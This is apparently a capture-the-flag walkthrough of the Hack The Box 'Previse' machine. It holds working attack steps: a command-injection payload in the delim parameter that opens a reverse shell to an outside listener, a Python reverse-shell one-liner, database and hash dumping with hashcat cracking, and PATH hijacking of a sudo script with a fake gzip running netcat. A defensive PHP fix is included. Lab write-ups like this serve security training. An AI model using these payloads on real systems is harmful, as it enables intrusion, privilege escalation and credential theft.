Lance Grover

HTB – Previse – Walkthrough

Quick notes for the Previse HTB machine

nmap -sV -sC 10.10.11.104

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 22:15 MST
Nmap scan report for 10.10.11.104
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds


echo "10.10.11.104 previse.htb" >> /etc/hosts


ffuf -u http://previse.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://previse.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php               [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php            [Status: 302, Size: 0, Words: 1, Lines: 1]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
footer.php              [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php              [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico             [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.                       [Status: 302, Size: 2801, Words: 737, Lines: 72]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
status.php              [Status: 302, Size: 2968, Words: 749, Lines: 75]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htm                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswds              [Status: 403, Size: 276, Words: 20, Lines: 10]
nav.php                 [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php            [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php               [Status: 302, Size: 4914, Words: 1531, Lines: 113]
.htgroup                [Status: 403, Size: 276, Words: 20, Lines: 10]
wp-forum.phps           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.bak           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htuser                 [Status: 403, Size: 276, Words: 20, Lines: 10]
.ht                     [Status: 403, Size: 276, Words: 20, Lines: 10]
.htc                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.old           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htacess                [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [37050/37050] :: Job [1/1] :: 449 req/sec :: Duration: [0:01:20] :: Errors: 1 ::

curl -v -d "username=lanix13&password=mypass&confirm=mypass" http://previse.htb/accounts.php

I was able to log in and go to the Files tab, where a siteBackup.zip is available for download.

mkdir siteBackup
cd siteBackup/
unzip ../siteBackup
Archive:  ../siteBackup.zip
  inflating: accounts.php            
  inflating: config.php              
  inflating: download.php            
  inflating: file_logs.php           
  inflating: files.php               
  inflating: footer.php              
  inflating: header.php              
  inflating: index.php               
  inflating: login.php               
  inflating: logout.php              
  inflating: logs.php                
  inflating: nav.php                 
  inflating: status.php

In the backup, the log export handler (logs.php, reached from file_logs.php) has something fun: the delim POST parameter is interpolated straight into exec().

logs.php:$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
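As an added example (not code from the site backup), here is that exec() call beside a hardened version that only accepts the delimiter names the form offers (assumed here to be comma, space and tab) and quotes the value with escapeshellarg() anyway:

```php
<?php
// Added example, not part of the Previse source. It contrasts the vulnerable
// exec() call found in logs.php with a hardened handler.

// Vulnerable: $delim is pasted into a shell command line, so any shell
// metacharacter in the POST body (& ; | $( ) ...) runs extra commands as www-data.
function run_log_export_vulnerable(string $delim): string
{
    return (string) exec("/usr/bin/python /opt/scripts/log_process.py {$delim}");
}

// Assumption: these are the only delimiter names the file_logs.php form offers.
const ALLOWED_DELIMS = ['comma', 'space', 'tab'];

// Allowlist check: returns the value only if it is exactly one of the known names.
function validate_delim(string $delim): ?string
{
    return in_array($delim, ALLOWED_DELIMS, true) ? $delim : null;
}

// Hardened: reject anything outside the allowlist, log the rejection for the
// defenders, and still quote the argument so a future edit cannot reintroduce the bug.
function run_log_export_hardened(string $delim): string
{
    $safe = validate_delim($delim);
    if ($safe === null) {
        http_response_code(400);
        error_log('logs.php: rejected delim value from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        return '';
    }
    $cmd = '/usr/bin/python /opt/scripts/log_process.py ' . escapeshellarg($safe);
    return (string) exec($cmd);
}

// Constructed inputs: a legitimate value and one carrying a shell metacharacter.
var_dump(validate_delim('comma'));     // string(5) "comma"
var_dump(validate_delim('comma&id'));  // NULL -> never reaches exec()
```

Note that the allowlist is what closes the hole; escapeshellarg() alone would still let an attacker pass arbitrary strings as a single argument to log_process.py.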

curl -v -d "username=lanix133&password=mypass" http://previse.htb/login.php

nc -lnvp 1234

curl -v -b "PHPSESSID=2qvup9fgetiqljd36jieg3gbhl" -d "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/1234+0>%261'" http://previse.htb/logs.php

I have a basic shell; I wanted to upgrade it. Usually I can with this, but it didn't work in this case:

python -c 'import pty;pty.spawn("/bin/bash")'

So I went ahead and just spawned a new reverse shell using python:

nc -lvnp 6666
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Now in this new shell I could run mysql a little better:

nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 51970
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ screen -list
screen -list
No Sockets found in /run/screen/S-www-data.

www-data@previse:/var/www/html$ mysql -u root -p < "show databases"    
mysql -u root -p < "show databases"
bash: show databases: No such file or directory
www-data@previse:/var/www/html$ mysql -u root -p -e "show databases"
mysql -u root -p -e "show databases"
Enter password: mySQL_p@ssw0rd!:)
Database
information_schema
mysql
performance_schema
previse
sys
www-data@previse:/var/www/html$ mysql -u root -p previse -e "show tables;"
mysql -u root -p previse -e "show tables;"
Enter password: mySQL_p@ssw0rd!:)
Tables_in_previse
accounts
files
www-data@previse:/var/www/html$ mysql -u root -p previse -e "select * from accounts;"
mysql -u root -p previse -e "select * from accounts;"
Enter password: mySQL_p@ssw0rd!:)
id	username	password	created_at
1	m4lwhere	$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.	2021-05-27 18:18:36
2	loda123	$1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1	2022-01-07 05:13:23
3	vector	$1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1	2022-01-07 05:13:24
4	lanix13	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:29:49
5	bigbose	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:32:21
6	adrian	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:48:10
7	lanix133	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:59:04
www-data@previse:/var/www/html$

I took the hash for m4lwhere and used hashcat to crack it:

hashcat -m 500 previse.hash /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

I took that password and the m4lwhere username and attempted SSH; it worked!

$ ssh m4lwhere@previse.htb
The authenticity of host 'previse.htb (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
m4lwhere@previse.htb's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan  7 06:22:56 UTC 2022

  System load:  0.07              Processes:           184
  Usage of /:   50.5% of 4.85GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt 
ae1**************************


m4lwhere@previse:~$ sudo -l
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh 
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz


cd /dev/shm
echo "nc 10.10.14.10 5555 -e /bin/bash" > gzip

nc -lvnp 5555

export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh

listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 59622
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt	
cat root.txt
6e2c7***************

And the final proof:

cat /etc/shadow
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::